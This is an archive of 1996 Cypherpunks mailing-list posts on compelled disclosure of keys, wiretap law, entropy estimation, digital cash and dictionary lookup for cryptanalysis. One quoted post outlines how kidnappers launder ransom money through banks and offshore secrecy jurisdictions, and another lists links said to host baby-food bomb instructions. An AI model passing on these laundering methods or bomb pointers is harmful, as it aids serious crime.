>> is undecided, so far as I know. My own inclination is that it will be
>> decided to be no different than the key to a locked diary--by itself, it is
>> not self-incrimination.)

Is this really an issue?  I am not an expert, but I just read a
Supreme Court case:

   DOE v. United States, 487 U.S. 201; 108 S. Ct. 2341 (1988)

It involved someone who was ordered by the court to consent to the
Cayman Islands bank to turn over account records.  The Supreme
Court said yes, because it is "more like 'be[ing] forced to
surrender a key to a strongbox containing incriminating documents'
than it is like 'be[ing] compelled to reveal the combination to
[petitioner's] wall safe.'"

The quote refers to Stevens' dissent, which said:

   A defendant can be compelled to produce material evidence that
   is incriminating.  Fingerprints, blood samples, voice
   exemplars, handwriting specimens, or other items of physical
   evidence may be extracted from a defendant against his will.
   But can he be compelled to use his mind to assist the
   prosecution in convicting him of a crime?  I think not.  He may
   in some cases be forced to surrender a key to a strongbox
   containing incriminating documents, but I do not believe he can
   be compelled to reveal the combination to his wall safe -- by
   word or deed.

I conclude that in a criminal case, all of the supreme court
justices agree that a criminal defendant cannot be forced to
reveal the combination to a wall safe, or any other information in
his mind, by the Fifth Amendment.

An escrow agent can presumably be compelled, unless his is accused
of a crime, or has a privilege, or is outside jurisdiction.
Interestingly, a footnote in the above case said:

   The Government of the Cayman Islands maintains that a compelled
   consent, such as the one at issue in this case, is not
   sufficient to authorize the release of confidential financial
   records protected by Cayman law.

Sounds like the Cayman Islands might be a good place for your key
escrow agents.

Roger Schlafly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sat, 20 Apr 1996 08:08:08 +0800
To: cypherpunks@toad.com
Subject: Re: DANGER! Baby-Food Bombs on the Internet! [was Re: (Fwd)]
Message-ID: <199604192054.PAA02825@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei (trei@process.com) writes:
>As usual, altavista comes to the rescue.
>
>*A* baby food jar bomb is described at:
>
>	http://studentweb.tulane.edu/~llovejo/explode.txt
>
>and echoed overseas at
>
>	http://ps.cus.umist.ac.uk/~vivaldi/boom/original.txt 
>
>
>I could not find the article on harvesting gunpowder from shotgun shells. Neat stuff in
[...]

That's okay...it should be on Thomas in the Congressional Record courtesy
of Senator Biden.

                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 20 Apr 1996 14:04:57 +0800
To: cypherpunks@toad.com
Subject: Baby-Food Bombing and highly selective quoting
In-Reply-To: <199604190412.VAA12784@jobe.shell.portal.com>
Message-ID: <Pine.ULT.3.92.960419161343.18820D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, some anonymous FUDder sent us this:

> ------- Forwarded Message Follows -------
> Date:          Thu, 18 Apr 1996 10:01:03 -0500
> From:          Al Thompson <alt@iquest.net>
> To:            Multiple recipients of list NEWS <NEWS@AEN.ORG>
> Subject:
>
> [Congressional Record: April 17, 1996 (Senate)]
> [Page S3454-S3478]

Specifically, page S3455. But the quote is so out of context as to be
inaccurate.

For an accurate record of Senator Biden's remarks, plus the full text of
the Baby-Food Bomb and Unabomber Wannabe documents, you want to follow the
*second* of the *two* TERRORISM PREVENTION ACT--CONFERENCE REPORT links
on:

 http://thomas.loc.gov/r104/r104s17ap6.html

I think the following is a permanent URL, but I'm sure you can't make hard
links any deeper:

 http://thomas.loc.gov/cgi-bin/query/z?r104:S17AP6-332:

Also note that this speech concerns an amendment to S735 that FAILED.
I.e., the language for which the esteemed [snort] Mr. Biden is arguing IS
NOT IN THE BILL AS PASSED BY THE SENATE.

>[...]
>                                                   As some people tell
> it, you would think the FBI and BATF and the local and State police
> are tapping our phones left and right, that they are riding down the
> streets in vans with electronic devices eavesdropping into our
> windows and houses--which they have the capacity to do, by the way.

Mr. Biden's next sentence, which either Mr. Thompson or the anonymous
forwarder conveniently left out, is "But that is just not the way it
works." It should come as no surprise to anyone on the cypherpunks that
such things are technically possible. But do they happen? Does even our
friend Senator Joe "You Heard It Here First" Biden approve? Mr. Biden's
speech continues, also conveniently left out by Mr. Thompson and the
anonymous forwarder:

 That necessity requirement is meant to ensure that wiretapping is not the
 normal investigative technique, like physical surveillance or the use of
 informants. These are very serious protections, Mr. President. I believe
 that interposing a court between the prosecutor and the wiretap is a
 citizens' best protection.

 But even before we get to the judge who makes his decision, there is a
 very painstaking, stringent process within the Justice Department for
 determining when to seek a court authorization for a wiretap.

 First, the agent in the field, under the supervision of his or her
 supervisor, must write an affidavit, a sworn affidavit, that they must
 sign that sets out all the particular facts relating to probable  cause,
 because even if an order is granted based on the agent, if he is lying,
 then that information is gone even if the judge issued the wiretap
 order.
[...]
 This is painstaking. It is time consuming, as well it should be, for we
 want to make sure that wiretaps are used in only the most serious cases.
 We want to make sure that they are used only as a last resort when all
 other less intrusive techniques have failed, and we want to make sure
 that the Government is not making unwarranted intrusions into our
 privacy. But we also need to make sure that law enforcement has the
 tools, if they meet all these hurdles, to catch the bad guy.
[...]
 You cannot get a wiretap, even if you do all the things I just said,
 unless you turn to the Criminal Code, and you have all these crimes
 listed in the Criminal Code. OK. You may find a crime in one section, and
 then you have to turn to another section, section 251, of the Criminal
 Code entitled, `Authorization for Interception of Wire, Oral or
 Electronic Communications.' And then you have to find there in subsection
 (c) the list of offenses for which you can get a wiretap.  Not every
 crime is entitled to have a wiretap attached to it.

So there we are. The next speech is by Orrin Hatch, who doesn't really
address any of Biden's points, but that's OK, because I don't agree with
them.

Oh yeah, and Biden read the full text of the "Attention All Unabomber
Wannabes" and "Babyfood Bombs" documents into the Congressional Record,
supposedly to underscore the point that those nasty Republicans are
endorsing such nasty nasty stuff. Sort of like Exon's little blue book.

So if you want to know how to build a baby-food bomb, simply write your
congresscritter.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 20 Apr 1996 08:29:46 +0800
To: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <9604191918.AA17670@divcom.umop-ap.com>
Message-ID: <199604192048.QAA12275@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Jon Leonard" writes:
> Perry's right: giving up any statistical information is too much.
>  
> A slightly contrived example of why tossing out duplicated bytes is bad:
>  
> Suppose that a military organization is using this almost one-time-pad
> system, and my spies tell my they've fallen into the habit of sending
> "attack" and "defend" as their only 6-byte messages.  This isn't a problem
> with a real one-time pad (except for traffic analysis...), but this lets
> me determine the message 3.8% of the time!

This could actually be used for traffic analysis in many instances;
you could succeed in extracting small amounts of information from the
passing data.

Any amount of leakage can in some instances be too much...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 20 Apr 1996 12:57:51 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <m0uAR5B-0008z7C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 PM 4/19/96 -0700, anonymous-remailer@shell.portal.com wrote:
>Black Unicorn wrote:
>
>>>
>>
>> Clever kidnappers make arrangement in advance to deposit this cash with 
>> willing financial institutions who will hold it for several years before 
>> mixing it into their cash withdrawl stream.  Kidnappers are paid based 
>> on a subtraction of interest for the period while the cash is undeposited 
>> and earns no interest for the financial institution, plus a fee.
>> 
>> BCCI was quite notorious for using this method to cool off hot money.
>> 
>> When the money was only mildly hot, it was simply physically transported 
>> to offshore banks in smaller lots and used for their cash payouts.  
>> (While riskier, this allowed the payment of interest).
>> 
>> The other option was simply to launder the money through enough 
>> agitations so that two or three banking secrecy entities were between the 
>> return of the currency to free circulation and the kidnappers.
>>
>
>christ.
>
>who the hell is this guy?

He's a person whose entire income stream (or most of it, probably) is 
derived from the misbehavior of government.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Eckenwiler <eck@panix.com>
Date: Sat, 20 Apr 1996 10:26:38 +0800
To: rschlafly@attmail.com (Roger  Schlafly)
Subject: Re: 5th protect password?
In-Reply-To: <rschlafly1102233230>
Message-ID: <199604192318.TAA22554@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Roger  Schlafly sez:
+    [quotes from]
+    DOE v. United States, 487 U.S. 201; 108 S. Ct. 2341 (1988)
+ ...
+ I conclude that in a criminal case, all of the supreme court
+ justices agree that a criminal defendant cannot be forced to
+ reveal the combination to a wall safe, or any other information in
+ his mind, by the Fifth Amendment.

Except that the Fifth Amendment is not limited to "criminal cases" in
the way one might ordinarily understand that phrase.  One may assert
the Fifth Amendment in a civil case, in an administrative proceeding,
at a legislative hearing, or, indeed, in the absence of any formal
proceeding.  See _Kastigar_. 

(I posted a summary of Doe II just the other day.  Did it not reach
the list?)

Also, "any other information" is a little too broad.  You can be
forced to reveal "pedigree" information such as name and DOB.  See
_Penna. v. Muniz_ (1990).  Asking an apparently drunk driver the date
of his sixth birthday (as part of a DWI test) is, however, an effort
to elicit Fifth Amendment "testimony"; given the added factors of
potential incrimination and compulsion (implicit in custodial
interrogation sans Miranda warnings), the privilege may be validly
exercised in response to such a question.  See ibid.

The much more interesting question, from a legal perspective, is what
happens if your key/password/passphrase is written/stored on physical
media.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 20 Apr 1996 15:50:17 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <OTwdx8m9LYbG085yn@netcom.com>
Message-ID: <Pine.SUN.3.91.960419192512.4950B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Apr 1996, Alan Bostick wrote:

> Don't forget: There are lots of colleges and universities on the net,
> and most of these universities have undergraduates, and a significant
> fraction of these undergraduates are minors.  The potential user base is
> going to be mixed and must be presumed to be so.  (That, I'm told, is
> the chief justification of the Carnegie-Mellon ban on the alt.sex.*
> Usenet newsgroups.) *Lots* of systems are affected by this problem.


This is an excellent point, and one worth repeating. The Chronicle of
Higher Education has been quite diligent in covering the CDA hearings in
Philadelphia since their readership is concerned about this issue. 

As for CMU's justification for censoring USENET newsgroups, the legal
justification for protecting minors is non-existent -- the
administration's reasons are financial and PR. Check out this February
1996 thread on the fight-censorship list: 

http://fight-censorship.dementia.org/fight-censorship/dl?thread=CMU+basks+in+favorable+publicity+from+Rimm+study,+Usenet+censorship&after=1323
  The attached excerpt from a Carnegie Mellon University PR newsletter
  shows how top administrators are basking in the publicity sparked by the
  Rimm study and CMU's CompuServe-esque censorship of sexual discussion
  groups in November 1994. The Warner Hall bureaucrats are smug in
  claiming they were justified in "limiting the access of pornography on
  our campus computers." 

Of course, that's not to say that CMU administrators aren't prudes as well.

For more info:
  http://www.cs.cmu.edu/~declan/rimm/
  http://www.cs.cmu.edu/~kcf/censor/
  http://joc.mit.edu/cmu.html

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 20 Apr 1996 10:55:27 +0800
To: trask@goodnet.com (Christian Odhner)
Subject: Re: Cybercash vs Mark Twain Digicash?
In-Reply-To: <Pine.SOL.3.91.960418123002.2012A-100000@goodguy>
Message-ID: <199604200051.TAA10080@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Despite its lack of popularity with many cypherpunks, I'm
occaisonally a fan of FV.  Yes, they blow big chunks in marketing.
Yes, they're selling a cheesy hack to move credit cards.  Yes, they
sit on merchants cash for 90 days.

	But..

	I can set up a client account for $2, a merchant for $10.  I
can set up the client account in literally three minutes.  I don't
need special software distributed in binary for machines I don't
have.

	I don't like it, but the low tech cheesy solutions often beat
out better stuff because they are cheap & low cost of entry.  Not to
start a religious war in this area, bit witness wintel.

Adam


| Hello. I've been off the list for quite a while now, so I'm not up to 
| date on the current ecash schemes. My company (a major internet service 
| provider with a lot of web advertising clients) is looking into which 
| digital cash method would be best to support for use on our customer's 
| web pages. The head of the web department has taken a look at several, 
| and is torn between Mark Twain's stuff and Cybercash. I was wondering if 
| people who have looked at these systems could give me a rundown on the 
| major differences. I know that Mark Twain is nice and secure (or at least 
| I *think* I know that) but Cybercash is signifigantly easier to use. Any 
| comments would be welcome, and to keep list volume down (I assume it's 
| still as busy as ever) I'd be happy to recieve replies via direct email, 
| and sumarize for the list.
| 
| Happy Hunting, -Chris Odhner
| - GoodNet -
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 20 Apr 1996 13:54:02 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Dictionary searching code
Message-ID: <199604200102.UAA10156@homeport.org>
MIME-Version: 1.0
Content-Type: text



	Does anyone have some code that will search a dictionary, and
tell me *quickly* if an arbitrary chunk of text is in the dictionary?
Pre-indexing steps are fine, as is using big chunks of disk for hash
tables.  The point of course, is to check arbitrary possible plaintext
that a test decryption produces.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 20 Apr 1996 15:55:02 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Dictionary searching code
In-Reply-To: <199604200102.UAA10156@homeport.org>
Message-ID: <Pine.SOL.3.91.960419200322.14381A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, Adam Shostack wrote:

> 
> 	Does anyone have some code that will search a dictionary, and
> tell me *quickly* if an arbitrary chunk of text is in the dictionary?
> Pre-indexing steps are fine, as is using big chunks of disk for hash
> tables.  The point of course, is to check arbitrary possible plaintext
> that a test decryption produces.

You could try using isite (see http://www.cnidr.org/), which is a pretty 
cool search engine, and should work well enough, and the patrie structure 
could make restarts really fast . 

The real answer to your question depends almost entirely on the machine
you wish to run it on- is memory not a problem? If so, tries may be your
best bet, though you may have bad cache interactions. Otherwise, you might
be best going for a probabalistic approach and using hash table to elimate
definite non-matches, then an AVL-Tree or similar for confirmation. If you
just use a single bit for each hash-table datum, you can afford to make
the table pretty sparse

Simon
---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 20 Apr 1996 12:34:28 +0800
To: Roger Schlafly <rschlafly@attmail.com>
Subject: Re: 5th protect password?
In-Reply-To: <rschlafly1102233230>
Message-ID: <Pine.SUN.3.91.960419203753.1662E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, Roger Schlafly wrote:

> 
> An escrow agent can presumably be compelled, unless his is accused
> of a crime, or has a privilege, or is outside jurisdiction.
> Interestingly, a footnote in the above case said:
> 
>    The Government of the Cayman Islands maintains that a compelled
>    consent, such as the one at issue in this case, is not
>    sufficient to authorize the release of confidential financial
>    records protected by Cayman law.
> 
> Sounds like the Cayman Islands might be a good place for your key
> escrow agents.

Currently, no better than the United States.

First, the Cayman Islands law refers primarily (if not exclusively) to 
financial information.  

Second, the judicial blocking provisions in the Caymans have been much 
reduced by the U.S. Mutual Legal Assistance treaty that penetrates 
banking secrecy when it is interfering with a criminal investigation 
involving money laundering or a series of other crimes.

Third, even in the event your escrow information was protected the court 
would be much more successful simply by trying to compel the defendant 
through contempt sanctions.  (It's not always enough to put data overseas, 
particularly where you're still sitting in the U.S. or otherwise within 
the court's jurisdiction).

Fourth, prosecutors don't typically bother to try and compell [escrow] 
agents, but instead seek "consent orders" from defendants instructing the 
agent to release the information.

So, in sum, the Caymans law doesn't have anything to do with 
non-financial information safekeeping.  Even if it did, a criminal 
investigation that would be interesting enough to try and seek non-tax 
and non-financial information from an agent in the Islands would almost 
certainly trigger the secrecy penetration clauses of the Mutual Legal 
Assistance Treaty.  And finally, the fact that they cant get your data is 
not going to protect you from a major main in the rump.

The large article I posted to the list goes into these points in detail in 
the context of protecting financial information and assets.  If you would 
like another copy, please let me know.

> 
> Roger Schlafly
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 20 Apr 1996 14:44:56 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Baby-Food Bombing and highly selective quoting
Message-ID: <m0uATlP-00092YC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 PM 4/19/96 -0700, Rich Graves wrote:
>On Thu, 18 Apr 1996, some anonymous FUDder sent us this:
>

> http://thomas.loc.gov/r104/r104s17ap6.html
>
>I think the following is a permanent URL, but I'm sure you can't make hard
>links any deeper:
>
> http://thomas.loc.gov/cgi-bin/query/z?r104:S17AP6-332:
>
>Also note that this speech concerns an amendment to S735 that FAILED.
>I.e., the language for which the esteemed [snort] Mr. Biden is arguing IS
>NOT IN THE BILL AS PASSED BY THE SENATE.
>
>>[...]
>>                                                   As some people tell
>> it, you would think the FBI and BATF and the local and State police
>> are tapping our phones left and right, that they are riding down the
>> streets in vans with electronic devices eavesdropping into our
>> windows and houses--which they have the capacity to do, by the way.
>
>Mr. Biden's next sentence, which either Mr. Thompson or the anonymous
>forwarder conveniently left out, is "But that is just not the way it
>works." 

Here's a question, however:  What, exactly, stands between the way it is 
supposedly done, today, and wiretapping with none of these "protections."  I 
see nothing in the Constitution which mandates them, at least explicitly, 
which suggests that the thugs might simply decide, tomorrow, that they are 
not really necessary after all.  Is it possible that the only reason these 
protections are in place is to provide a window-dressing of caution, to 
ensure that the disgust of the public doesn't get too great?

And another question I've never seen a satisfactory answer for:  Why is 
there not an automatic policy to inform the person tapped, at least after 
the tap is removed, analogous to the level of information the victim of a 
search warrant normally gets?


Jim Bell
jimbell@Pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sat, 20 Apr 1996 08:24:17 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: Nym Server Questions and Remailer Suggestion
In-Reply-To: <9604191659.AA01571@rpcp.mit.edu>
Message-ID: <Pine.3.89.9604192037.A28716-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, Joseph M. Reagle Jr. wrote:

> *. For the purpose of mitigating traffic analysis, has anyone considered
> creating a "delete-me" redirect, hence I could send a few messages to a nym

	On a related note, has anybody thought about creating a
	remailer, that sends out two, or more messages for each one
	received.  One message goes to the original, intended recipient,
	and the other does a loop thru the remailers, ending up at
	somebody's /dev/null, or something along those lines.

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Apr 1996 14:06:10 +0800
To: cypherpunks@toad.com
Subject: Bernstein ruling meets the virus law
Message-ID: <ad9da80f000210044d78@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It should be interesting to see what happens when the Bernstein ruling
(assuming it is further upheld as the court case and appeals proceed) meets
the proposed law making the writing of virus code a crime.

If crypto  software is essentially speech, albeit in a non-traditional
human language, then virus software is no different.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 20 Apr 1996 12:46:44 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Dictionary searching code
In-Reply-To: <199604200102.UAA10156@homeport.org>
Message-ID: <Pine.SUN.3.91.960419214457.1662F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, Adam Shostack wrote:

> 
> 	Does anyone have some code that will search a dictionary, and
> tell me *quickly* if an arbitrary chunk of text is in the dictionary?
> Pre-indexing steps are fine, as is using big chunks of disk for hash
> tables.  The point of course, is to check arbitrary possible plaintext
> that a test decryption produces.

There are several serachable dictionaries on the web.

That might be a good place to look for search code.

> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 20 Apr 1996 17:58:25 +0800
To: Adam Shostack <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Dictionary searching code
Message-ID: <199604200639.XAA24430@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:02 PM 4/19/96 -0500, Adam Shostack wrote:
>        Does anyone have some code that will search a dictionary, and
>tell me *quickly* if an arbitrary chunk of text is in the dictionary?
>Pre-indexing steps are fine, as is using big chunks of disk for hash
>tables.  The point of course, is to check arbitrary possible plaintext
>that a test decryption produces.

This application sounds perfect for Bloom filters.  The basic idea of a
Bloom filter is to build a database by taking each word in the dictionary
and hashing with N different hashes.  The hashes do not need to by
cryptographically secure, but they do need to be good hashes, XOR doesn't
make it.  You use those hashes as bit offsets in a giant bit map, which is
the database.  When building the database you turn on the bits at each of
these N locations.

When accessing the database, you hash the chunk of text with the same
hashes, and then test the bits in the database at those offsets.  If any of
the bits are zero, then the chunk of text is not in the dictionary.

The failure mode is to say something is in the dictionary when it isn't. 
If half the bits in the database are on, then the probability of failure is
2**(-N), so if N==10, then the failure rate is 1 in 1024.  If empirically,
you get a higher failure rate, check the quality of your hashes.

For cryptanalysis, I might pick a higher N and eyeball check for failures. 
Say you want 1 in a million failure rate, and have an 80,000 word
dictionary.  You need a 20 * 80,000 * 2 bit database, which is 400,000
bytes.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 20 Apr 1996 14:50:34 +0800
To: David Loysen <dwl@hnc.com>
Subject: Re: plaugue of unsubscribes
In-Reply-To: <199604191618.JAA20702@spike.hnc.com>
Message-ID: <Pine.BSF.3.91.960420000537.3166C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


If you haven't already deleted the "unsuscrive" messages, take a look at
the headers. I suspect that someone is using a browser to forge e-mail
(very easy to do, bit very obvious where it came from) A lot of these have
come from the same address. 

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------
> >What still confuses me is the number of people who asked to be
> >"unsubscrived."  Seems like an odd coincidence that all those folks would
> >miss the B key.  Some had done it severeal times in the same message.  I
> >wonder if they were totally set up -- if they got mail telling them to
> >"unsubscrive."  Some people's idea of fun boggles me...
> >
> >Rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Sat, 20 Apr 1996 18:06:24 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
In-Reply-To: <199604182255.PAA13373@jobe.shell.portal.com>
Message-ID: <4la5b6$1sb@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199604182255.PAA13373@jobe.shell.portal.com>,
Hal  <hfinney@shell.portal.com> wrote:
> So I think the lesson is that there is only one way to estimate entropy,
> and that is to study your source.  I have to agree with Perry that this
> filtering concept is not the way to go.  It is a red herring that lures
> you in the direction of automatic entropy estimation, and that is really
> not safe.

Excellent point!  Very nicely put.

You've convinced me: I was looking at the problem the wrong way.
Thanks for correcting & educating me...

Appreciative of the "signal",
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 20 Apr 1996 18:36:20 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Yadda Yadda Yadda] Re:
In-Reply-To: <m0uAR5B-0008z7C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960420025151.17622B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, jim bell wrote:
> >>
> >
> >christ.
> >
> >who the hell is this guy? [unicorn]
> 
> He's a person whose entire income stream (or most of it, probably) is 
> derived from the misbehavior of government.

Most of my income comes from investments and venture capital.  I circumvent 
government only as a hobby.

> Jim Bell
> jimbell@pacifier.com 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 20 Apr 1996 14:47:50 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Dictionary searching code
Message-ID: <199604200410.VAA21173@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Adam Shostack <adam@lighthouse.homeport.org> 04/19/96  8:02pm -0500
= 
= 
= 	Does anyone have some code that will search a dictionary, and
= tell me *quickly* if an arbitrary chunk of text is in the dictionary?
= Pre-indexing steps are fine, as is using big chunks of disk for hash
= tables.  The point of course, is to check arbitrary possible plaintext
= that a test decryption produces.
= 

	for this purpose, the OLD unix code starting with V6 20 years ago has a speller with  
a fairly comprehensive dictionary.  The code is small. about 15 years ago I broke it out and  
rewrote it as linkable libraries to handle multiple dictionaries. I know I have the code  
somewhere --probably on MIPS 2000 tape or Sun 3 tape...  the code also contains excellent  
prefix/suffix codes, etc.  I do not remember spending a great deal of time doing the  
conversion, and it was straighforward to convert it to a callable library (or even a .dll).

	attila

-- 
 Obscenity  is a crutch  for inarticulate motherfuckers.
 Fuck the CDA!

cc: Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael B Herf <herf+@CMU.EDU>
Date: Sat, 20 Apr 1996 19:58:59 +0800
To: adam@lighthouse.homeport.org>
Subject: Re: Dictionary searching code
In-Reply-To: <199604200102.UAA10156@homeport.org>
Message-ID: <klS_BhG00iWY40oIYF@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I have some anagram code that could be easily adapted to do what you
say.  Basically, it will find any anagram of a word exists in a
dictionary.  This means you can query an arbitrarily large dictionary at
>100 words per second.  

Actually, now that I think about it, it takes 2 seeks, but you could
remove one of them if you were doing a lot of queries.  (i.e. 1+n seeks
for n=number of words.)

Look at ftp://vivarin.res.cmu.edu/pub/scram

mike





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: runner@asiapac.net
Date: Sat, 20 Apr 1996 11:00:56 +0800
To: cypherpunks@toad.com
Subject: Add-in encryption module to Netscape
Message-ID: <199604192338.HAA06653@gandalf.asiapac.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi, 

Lurking here for quite some time until now a real problem has come up and I
need help here.

I'm not in the US of A and the Netscape commerce server that my employer 
recently purchased has only 48bit key (as told by the salesman). My question is
whether it is possible to add-in my own security module (RSA) and secondly, how
difficult is it? The salesman cannot answer me.

Thanks a lot. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@c2.org
Date: Sun, 21 Apr 1996 01:55:28 +0800
To: cypherpunks@toad.com
Subject: Welcome to clueless
Message-ID: <199604201535.IAA05505@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the clueless mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@c2.org" with the following command
in the body of your email message:

    unsubscribe clueless cypherpunks@toad.com

Here's the general information for the list you've
